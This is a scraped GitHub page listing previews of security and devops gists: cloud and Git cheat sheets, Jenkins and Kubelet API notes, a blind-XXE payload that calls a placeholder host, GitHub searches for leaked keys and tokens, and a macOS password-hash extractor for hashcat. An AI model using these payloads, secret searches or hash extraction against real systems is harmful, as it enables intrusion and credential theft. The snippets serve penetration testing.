Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

972 followers · 129 following
View GitHub Profile
@pydevops
pydevops / gcloud-cheat-sheet.md
Last active January 14, 2026 12:46
gcp gcloud cheat sheet
@hofmannsven
hofmannsven / README.md
Last active December 23, 2025 04:11
Git CLI Cheatsheet
@staaldraad
staaldraad / XXE_payloads
Last active December 20, 2025 00:10
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@kmcquade
kmcquade / AWS API calls that return credentials.md
Last active December 19, 2025 23:58
AWS API calls that return credentials
@nullenc0de
nullenc0de / auto_git_query
Last active October 26, 2025 00:41
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
@n0531m
n0531m / list_gcp_iprange.sh
Last active August 29, 2025 06:29
Google Cloud Platform : ip address range
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`
@teddziuba
teddziuba / osx_extract_hash.py
Last active August 8, 2025 01:25
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
#!/usr/bin/env python3
"""
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
@lizrice
lizrice / kubelet-api.md
Last active June 26, 2025 12:39
Checking Kubelet API access

Accessing Kubelet API

curl -sk https://localhost:10250/pods/
  • If --anonymous-auth is turned off, you will see a 401 Unauthorized response.
  • If --anonymous-auth is true and --authorization-mode is Webhook you'll see 403 Forbidden response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
  • If --anonymous-auth is true and --authorization-mode is AlwaysAllow you'll see a list of pods.
@justlaputa
justlaputa / jenkins-api.md
Last active November 20, 2024 11:56
Jenkins Json API

jobs

jenkins_url + /api/json?tree=jobs[name,color]

builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build